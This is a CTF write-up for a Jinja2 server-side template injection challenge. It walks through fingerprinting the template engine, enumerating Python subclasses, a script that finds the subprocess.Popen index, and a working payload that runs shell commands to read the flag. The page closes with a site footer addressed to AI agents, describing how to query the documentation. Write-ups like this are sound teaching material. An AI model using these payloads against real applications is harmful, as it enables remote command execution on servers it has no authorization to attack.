# Super Secure Technology Infrastructure

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Easy       | 146    | 9      |

## Description

> Super secure technology infrastructure, \
> A fortress built with digital flair, \
> Encrypted and protected, no intrusion allowed, \
> Our data safe from any dare.\
> \
> Poem by ChatGPT

By the challenge title, we can identify that it is a `Server Side Template Injection` vulnerability.

{% hint style="info" %}
Server-side template injection (SSTI) is a type of vulnerability that occurs when a web application dynamically generates templates using user input, and then sends those templates to the server to be rendered. If the user input is not properly sanitized, an attacker can inject malicious code into the template, which will be executed on the server when the template is rendered.
{% endhint %}

First, we will need to identify the templating engine used, and we can refer to this chart below.

<figure><img src="/files/xksbA9wO9q8qaToxHTFZ" alt=""><figcaption></figcaption></figure>

After playing with the input, we can identify that it is running `Jinja2`. We can also refer the the [hacktricks](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection) guide to identify the templating engine.

Referring to [t](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti)he [Jinja2 SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti) guide, we are able to perform remote code execution and get the flag!

First, we will need to identify the `<class 'subprocess.Popen'>` offset. We can find it using the payload below to list all the subclasses

```
{{''.__class__.__mro__[1].__subclasses__()}}
```

<figure><img src="/files/wavMXDNrO8qhpsGJpNix" alt=""><figcaption></figcaption></figure>

Very handy script to find the offset&#x20;

```python
data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
data = data.split(', ')

id = []
for i,d in enumerate(data):
    if 'subprocess' in d:
        print("Found in index:",i)
        id.append(i)

for i in id:
        print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")
```

<figure><img src="/files/RrW1H70cI6BQesaC9dT7" alt=""><figcaption></figcaption></figure>

After finding `<class 'subprocess.Popen'>` we can then utilize it to perform RCE.

```
{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}
```

<figure><img src="/files/gJjarEKCMspMn6SwbcE5" alt=""><figcaption></figcaption></figure>

## References

<https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection>

[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kabinet.gitbook.io/ctf-writeup/authored/nyp-infosec-december-ctf-2022/super-secure-technology-infrastructure.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.